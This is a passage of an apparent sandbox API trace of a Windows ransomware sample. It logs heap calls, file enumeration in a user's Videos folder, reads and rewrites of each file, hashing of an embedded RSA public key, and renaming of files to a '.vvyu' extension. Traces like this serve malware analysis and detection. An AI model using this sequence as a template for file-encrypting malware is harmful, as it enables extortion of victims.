Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3930 | out: hHeap=0x2c0000) returned 1 [0191.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.720] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x15f16, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x15f16, lpOverlapped=0x0) returned 1 [0191.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.799] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15f1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.799] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.880] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.881] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.881] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.882] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.882] CloseHandle (hObject=0x584) returned 1 [0191.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.888] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\07H2voZRMEM4mGd_N.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\07h2vozrmem4mgd_n.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\07H2voZRMEM4mGd_N.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\07h2vozrmem4mgd_n.swf.vvyu")) returned 1 [0191.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.891] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.893] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa959890, ftCreationTime.dwHighDateTime=0x1d89752, ftLastAccessTime.dwLowDateTime=0x54e84250, ftLastAccessTime.dwHighDateTime=0x1d8a08d, ftLastWriteTime.dwLowDateTime=0x54e84250, ftLastWriteTime.dwHighDateTime=0x1d8a08d, nFileSizeHigh=0x0, nFileSizeLow=0x15bf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9hkv.mp4", cAlternateFileName="")) returned 1 [0191.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3930 [0191.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0191.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3930 | out: hHeap=0x2c0000) returned 1 [0191.893] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\9hkv.mp4") returned=".mp4" [0191.893] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\9hkv.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\9hkv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.895] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=89075) returned 1 [0191.896] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.903] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15bcd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.903] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.912] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.912] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x15bf3, lpOverlapped=0x0) returned 1 [0191.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.915] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.918] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.918] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.918] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.918] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.918] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.919] GetLastError () returned 0x0 [0191.919] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.919] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.920] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.920] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.920] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x15bf0) returned 0x2af5168 [0191.922] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3930 [0191.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3978 [0191.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0191.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.924] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0191.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0191.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60c8 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae60b0 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0191.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0191.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.930] GetCurrentThreadId () returned 0x5d8 [0191.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5d18 [0191.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.931] GetCurrentThreadId () returned 0x5d8 [0191.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0191.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60c8 [0191.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 